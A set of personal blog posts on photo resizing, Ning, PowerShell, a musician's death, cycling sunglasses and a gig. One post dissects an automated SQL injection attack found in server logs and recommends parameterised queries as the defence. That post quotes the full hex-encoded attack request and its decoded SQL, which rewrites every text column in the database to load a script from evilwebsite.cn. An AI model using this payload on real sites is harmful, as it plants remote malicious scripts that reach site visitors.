With a couple of small children, and a nice digital SLR, a lot of photos get taken in this house.

Of course people want the photos emailed to them, and it’s just impolite to email a collection of 3mb images (did you get that everyone ? impolite!). It’s pretty tedious going through and manually resizing stacks of files, so a few years ago I looked at some alternatives.

The answer is ImageMagick, the open source image manipulation suite that will do just about everything, run on any platform and integrate with any language.

There are a few elegant ways I could have used the ImageMagick library to automate some photo resizing but a two line batch file does an ok job. Unfortunely, every time I’ve reinstalled Windows on Sam’s computer, I forgot to back up and migrate this particular script. To having to look up all the command line parameters again tonight, and to avoid it next time, here is the script.

mkdir emailable
for %%f in (*.jpg) DO "c:\Program Files\ImageMagick-6.4.3-Q16\convert.exe" "%%f" -resize 1000 -quality 50 "emailable\small_%%f"

Not pretty, but functional. Save this in a file called “emailable.bat” somewhere in your path.

I use the Command Shell here PowerToy to open up a command window in a new directory of photos (the Canon software exports photos to a folder for each day), type “emailable” and it creates a subdirectory and copies a lower quality, smaller version of every photo there.

Hopefully this workflow will appeal to someone else out there, but for me, it’s now safely online and in Google’s cache.

This is not the first time I’ve talked about SQL Injection here, but I’ve spent some time this week cleaning up an automated SQL Injection attack on a site I’ve inherited the maintenance on.

I got the call the other day saying “the site is looking funny, all the formatting is messed up”, one look at the page and a view source and I knew what was up. A database restore fixed the immediate problem, then it was a matter of looking at the server logs to find out the how and where so I could fix it.

The attack was pretty easy to find in the logs, a whole bunch of requests that looked like this :

GET /default.asp ti=1402&client=1;DECLARE%20@S%20VARCHAR(4000);
SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152
434841522832353529204445434C415245205461626C655F437572736F722043
5552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046
524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574
845524520612E69643D622E696420414E4420612E78747970653D2775272041
4E442028622E78747970653D3939204F5220622E78747970653D3335204F522
0622E78747970653D323331204F5220622E78747970653D31363729204F5045
4E205461626C655F437572736F72204645544348204E4558542046524F4D205
461626C655F437572736F7220494E544F2040542C4043205748494C45284040
46455443485F5354415455533D302920424547494E2045584543282755504441
5445205B272B40542B275D20534554205B272B40432B275D3D525452494D284
34F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E756A6E632E
72752F6A732E6A733E3C2F7363726970743E27272729204645544348204E45
58542046524F4D205461626C655F437572736F7220494E544F2040542C4043
20454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43
415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));
EXEC(@S);--

Ugly!

What’s happening here is the long ugly bit is a chunk of SQL encoded as Varbinary. A SQL variable (@S) is being declared, then the varbinary value is being cast back to varchar into the variable, which is then EXECuted.

If you decode this value, you get this bit of SQL code :

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://evilwebsite.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://evilwebsite.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Ouch!

So this is finding all the large text columns by querying the system tables, and updating them to insert a script tag which can deliver any nasty payload the decide to put there.

The reason this attack is so effective is to most asp websites (this is an old site that was hit), the most checking of querystring values is the old standard of replacing the apostrophes. As you see from the GET request, there are no apostrophes. So a typical piece of asp code might look like this :

Dim sql
sql = "SELECT id, title, body FROM articles WHERE id = " & Replace(Request.QueryString("id"), "'", "''")
set rs = conn.exec(sql)

The act of escaping the apostrophes is pretty good against pretty much every SQL Injection attack we’ve seen in the wild, but as you can see, totally useless against a binary encoded query that is being dynamically executed.

Thankfully the safeguards are easy and well documented.

• Strongly typed variables
• Parameterised queries and / or stored procs

If you’re in charge of an older site that doesn’t do these things, go check it now and make sure you’re databases are backed up. Because there are bots out there scanning, and you will get hit by this.

On security disclosure

Several years ago, while writing some articles on SQL Injection and preparing some training materials to present to some co workers I did a lot of experimenting and uncovered this style of attack. It is being used here to insert nasty script into content, but if you are running your website under a high privilege account (i.e. SA) you can do some real damage. It’s possible to fire off an xp_cmdshell command with this technique which lets you take full control of a server, all via a web site URL. I sent it round to a few trusted friends saying “what should I do about this ?” I’ve never been part of a security research scene and I had a dilemma. Publish this and educate a whole bunch of people on how to do it, or keep quiet about it and hope it didn’t get figured out by anyone else that wanted to use it maliciously.

In the end I kept quiet about it, so the irony that it came back to bite me isn’t lost.

What would you have done ?

This was originally an email to a friend looking for a platform to set up a small blogging network, I suggested Ning via Twitter and followed up with some more detailed thoughts. I’ve edited bits to make it a little more general.

I'm running two sites on it now, Sydneycyclist and Melbournecyclist although I don't have much to do with the layout or the day to day on the Melbourne one.

What's good about Ning, especially for what you want to do.

• Privacy - you can set up it so new members need to be approved, you can also only allow unapproved members to see the home page.
• Groups - you could set up sub groups, if you wanted to be able to set up say a Sydney group or anything else you can.
• Events are cool, you can set up an event, invite people to it and collect RSVPs
• Customisable user profiles - people can skin their own page however they like.
• Photos / videos etc, may not be as useful to you, but if you had a meetup it's a nice private place to post pics and comment on them. There are some nice touches like geotagging photos against Google maps.
• Front page is customisable, you can pull in RSS feeds, move around forum posts / gallery / any number of text boxes etc to your hearts content.
• Decent messaging system between members
• The activity bar lets you decide what sort of events show up, and you can do custom announcements

As for negatives, there isn't anything too bad about it. The front page can get a little slow and sluggish if you're pulling in lots of feeds.

There are also some limitations around the way the home page items work.
For example, when I put a forum box on the home page, I can have it display latest posts, or featured posts. What would be awesome is to be able to have the latest posts, plus any sticky / featured / announcement posts. I could do something by pasting in a link to an announcements text box though (just thought of that, I might go play with that idea).

There are times when a discussion partly fits in a group, but could also belong in the main forum. I've tamed my OCD and stopped worrying about that.

It costs a few bucks a month if you want to point a custom domain name at it.

All in all though, I like it. I never would have gotten those sites off the ground without it. A few of my members have gone and started their own networks for other interests too.

It's free and easy to set something up to try, although I will say that if you want to do that, give it a few hours to get your head around. It can be a bit overwhelming when you get started.

Check out the Ning blog, it has lots of inspiration.

Blogging about blogging is so 2003, but I have some rambling thoughts I need to put down. It’s 2am and I can’t sleep so you’ll have to excuse my self indulgence. You can always stop reading, it’s my blog after all!

I’ve been struggling a bit with what to do with this blog. I’ve had several attempts at blogging since about 2001 and grown pretty tired of all of them. I started this one up mainly to write about some cycling topics, but I put anything cycling related on Sydneycyclist these days.

My feeling is I should write more about some of the technical subjects that interest me, but I’m having a bit of trouble with what sort of format that should be in.

I’m as involved in various social media sites as anyone else (well except maybe Laurel Papworth) but I couldn’t bring myself to be yet another social media commentator, or worse still “evangelist”, because well, the world doesn’t need any more of those (no dig at Laurel there by the way, she was doing it before it was cool ).

Worse still would be putting forth my armchair view on Twitter’s scaling, and how it would be so much better if they wrote it in insert your favourite programming language here instead of Ruby.

What is tempting is to blog about my explorations through various technologies and code tips, for example I’ve been working with the new ASP.NET MVC framework and learning about it the way everyone else is, by scouring blogs and spending a bunch of time in Reflector and the source code. However, for every technology that I might be tempted to write about, there is someone like Stephen Walther doing a great job and I just don’t have the time to keep up. My lone Powershell post is a perfect example. Besides, my job really doesn’t involve life on the bleeding edge (MVC framework notwithstanding), by the time I get to implement tools they usually have to be pretty stable and proven, and the blog posts are already written.

I could write reviews of stuff I use and like, and I probably will do some more of this. It brings in traffic through “the google”, but that’s not a game I want to play. The counter of that is writing rants about stuff I don’t like, but I’m really trying to avoid that because…well… who needs more whiny bloggers ? (besides Twitter is a much more satisfying tool for a quick rant).

So that leaves the question, what does a architecty type technologist person blog about in the first quarter of the 21^st century ?

I suspect the answer actually lies somewhere along the lines of blogging about code and technical explorations, but more along the lines of doing useful things. My work often involves software integration and finding the best set of tools to make A talk to B, so maybe that’s where I need to be on the blog. I have a stack of links and thoughts and notes sitting inside Evernote about things that have taken my interest, perhaps I need to start building sample applications against them and put that up here. That would at least be something a little bit different.

I’m not really ready to retire this site, I am quite chuffed I managed to get the domain name. So I think I will try to use it a bit more.

If you made it this far, well done. Like I said, I needed to get some thoughts down and I may as well hit the publish button. Feel free to comment if you have any great ideas.

A while back I hinted at some exciting stuff I had going on, and that I planned to blog about it soon. Well, “me”, “blogging” and “soon” are obviously not terms that should be seen together, but that’s life.

At the beginning of March, I took up a new role as Director of Technology with the Inspire Foundation.

Inspire is a fantastic non-profit that runs a number of programs to help young people change their world. I’ve mentioned them in the past, I worked on ActNow with Leisa back in my Massive days.

Inspire decided that they needed to bring more of their web development in house rather than having to rely on third parties so much, and asked me to be in charge of technology.

It’s a bit of a dream job for me, but it did take me a little while to commit to it. I wasn’t sure about giving up my working at home full time and being able to be with the kids all day. However my job was involving me in all sorts of nasty company and project politics and in the end I decided that the amount of grumpyness I was bringing into the house was negating the benefits of me being there. As soon as I made the decision and started work, I immediately knew I’d made the right decision.

We have lots of fun stuff going on, and now I have this out of the way I might talk about them a little more on the blog. For starters, we’re making some tweaks to ActNow, a rebuild of Reachout is in the works and a couple of other things.

I’ll stop rambling now.

I’ve been interested in PowerShell for ages but haven’t put any serious time into it. About a year ago I installed it and started playing around, liked it but didn’t do anything really useful. I bought Bruce Payette’s Windows PowerShell in Action, which is excellent and I highly recommend it around then, and ran through the examples. I got what was possible with PowerShell, but I learn best by doing – and I really didn’t have anything I needed to build so the information didn’t really sink in.

This week I decided to revisit it and see what I could do. My interest was rekindled by listening to the .NET Rocks show with Kirk Munro which was a good explanation of the technology and an introduction to the free PowerGUI tool.

So I had another crack at writing PowerShell, I started with FizzBuzz (too easy), then moved on to replacing a .vbs script I’ve been using for a while.

I like a clean Windows desktop, I keep it clear of any program icons but I do use it to store any recent downloads or for keeping documents I’ve recently been sent. Unfortunately it means my desktop fills up pretty quick so I built a script that archives everything on my desktop to a Cleanup directory tree. So a word document will end up in C:\cleanup\doc and a Zip will go to C:\cleanup\zip etc. It works for me, I know where to look based on the type of document. Periodically I go through these folders and delete what  I don’t need, and move things I do need to a proper home.

I had a vbs script for doing this that worked fine, I have it run as a scheduled task when I log on. In VBScript this is about 25 lines of code ( I like to keep my code readable, if I can use 5 lines instead of 3 I will, so you could do it in fewer lines).

In PowerShell it’s much simpler.

$indir = Get-Item C:\Users\Damian\Desktop
$outdir = Get-Item C:\Cleanup\

foreach ($f in dir $indir) 
{
	if ( $f.Extension.length -gt 0 ) 
	{ 
		$strpath = "C:\cleanup\" + $f.Extension.Substring(1)
		if ( -not $(Test-Path -literalpath ($strpath)) )
		{
			New-Item -ItemType Directory -Path $strpath | Out-Null
		}
		$cpdir = Get-Item $strpath
		Get-Item ($f.Directory.ToString() + "\" + $f.ToString()) | move -Destination $cpdir
	}
}

I’m sure there is a better way to get some of the directories rather than joining strings, but this works nicely.

I plan on digging up a lot of the little utility scripts I’ve written over the years and converting them to PowerShell, I think it’s a very nice technology but the only way to really get it is just dig in and do it.

It’s now known by most of Sydney’s music community that Jackie lost his fight with cancer on the third of February 2008. The timing of this shocked us all, Jackie was still gigging a week before then.

I remember walking to the Rose in Erskineville every Tuesday night, fighting the crowds to listen to Jackie’s band and trying to get a good position to watch him conducting the band with his picolo bass. He always attracted great players and got them playing the tightest grooves, he kept them on their toes by throwing new grooves, stops, fills and solos at them at a moments notice. To the untrained eye it would look very rehearsed, but there was always small signals going on, a nod of the head, a look, a point with the neck of the bass. It was always magic. A lot of Sydney musos got their name out there by sitting in with Jack at the Rose.

For a while before it closed, my band B’Dussy had a residency at the Harbourside Brasserie. Jackie used to do the first set and then take off to a late gig. We never liked any bands sharing the bill with us, but at the Harby we used to sit back and not want him to finish.

When the Newtown RSL club opened back up and lured Jackie away from the Rose on Tuesday nights he got a bigger room to fill and a larger stage. He also started to bring in some crazier arrangemens, I remember one night sitting there listening to an amazing song, only to realise it was Jackie’s take on the Beatles’ Strawberry Fields. Jackie would take all sorts of blues songs, obscure funk and even the occasional Zappa tune and make them his own.

With his passing we’ve lost an incredible talent, his playing, his singing and his arrangements were always amazing and always unique. I’m going to miss the gigs (not that I’d seen many lately, small children tend to slow down that part of your social life), his ability to change a song in ways you’d never imagine, the post gig raves about the state of the world we’d occasionally have at the Townie in Newtown and just being able to say gday while grabbing a coffee or walking down the street in Erko. I regret that I never took up the offer to sit in with the band, I always figured it would happen eventually and now it never will.

Jackie Orszaczky, you were a true original, you will be missed.

You may notice yet another theme change on this blog, this time it’s accompanied by some new blog software as well.

I’ve been finding SubText a little cumbersome, and the development seems to have come to a complete halt, meanwhile Telligent have put out some betas of their new CMS, Graffiti. I downloaded beta 2 for a test drive and was really impressed. Skinning and customisation are so much easier than with SubText, within a short time of playing around I had my blog content imported and looking the way I wanted it (well, I’m using a tweaked but included theme, this may change.. but from a site structure standpoint it’s perfect). So I figured why the hell not just put it up there. My only real challenge was all my old URLs in Google. Thankfully (and I’m going to get a bit nerdy for a moment) they had the forethought to put a bunch of startup code directly in Global.asax so I was able to build my own redirection routine in there, then it was just a matter of pulling out all my old URLs from the BlogML and matching them with new ones.

If you are reading this in an RSS reader, it means I succeded there too!

I actually do want to blog more this year, I have some cool stuff going on I will be able to talk about soon.

Cross-posted on Sydney Cyclist.

It was a very Melbourne-like day, going from sunny to overcast to light rain and back to sunny every 20 minutes. A perfect day to test out my new Shimano Galaxy glasses with Photochromatic lenses.

I’d wanted some new glasses for a while, my BBB Winners have been great but the rubber covering on the arms had started to disintegrate and while I really liked the lens choice I wanted to try something adaptive to save changing lenses during early morning or late afternoon / evening rides.

The first thing I noticed about these glasses is just how light and comfortable they are, when you put them on for the first time inside the lenses are fairly clear and you barely know you are wearing them. Thanks to the rimless design, your visibility is maximised and the top and bottom of the lens, and the shape of the lens means it sits against your face nicely. As I said before, you can hardly tell you have them on.

After putting them on for the first time in the shop, I stepped outside into the bright sunlight to test out the main feature I have to say I was a little underwhelmed. The adaptive lenses are a lot more subtle than I expected, I’ve never owned any adaptive lenses before and I was expecting something not far off Zaphod’s Peril Sensitive Sunglasses, well maybe not quite that black, but something in the realm of the dark lenses on my old glasses. These stay fairly clear and light, but you do find that when you go into the light you’re squinting for a moment, then your eyes relax as the lenses adapt. Unless it’s the placebo effect…. but I do think they are working, if you look closely there is a difference.

So back to the very Melbourne-esque day we were having in Sydney, I rode out of the house and in the direction of Centennial park, it was overcast above my place but it wasn’t long until I rounded a corner and into some Sun. A moment of squinting, then back to comfort. A few minutes later I’m back in clouds, then the rain came. I could still see fine. The rain had cleared by the time I got to the park and started doing some laps, Centennial goes from open sky to tree covered shade in a few places and I never felt like I had the wrong glasses on. A good sign.

Since then I’ve done a couple of rides in very bright sun and they’ve performed well, not as good as specifically dark lenses, but certainly acceptable.

In summary, they are lightweight, very comfortable to wear and adapt to the conditions well. The lens colour change is a lot more subtle that I would have expected, but they do the job. They appear to be well made, have full UV protection and for the price (around the $100 AUD mark) they are great value. They also come with a great travel case and a microfibre bag / cleaning cloth.

I know this is a stupid amount of words to spend on some sunglasses, but I couldn’t find any info online for these (a problem I’ve found before) so I thought I’d help out the next few Google searchers.

A few weeks back I posted a YouTube video from a show I played at The Basement. I had a few people say to me “Hey, why don’t you tell me when you are playing ?”.

So here it is, if you’d like to come see me play, the next Basement show will be a good one.

November 10th, with the Elana Stone band and Miss Donne.

If you’d like to book a table for dinner, call the Basement on 02 9251 2797. Otherwise, you can book at Moshtix.

See you there!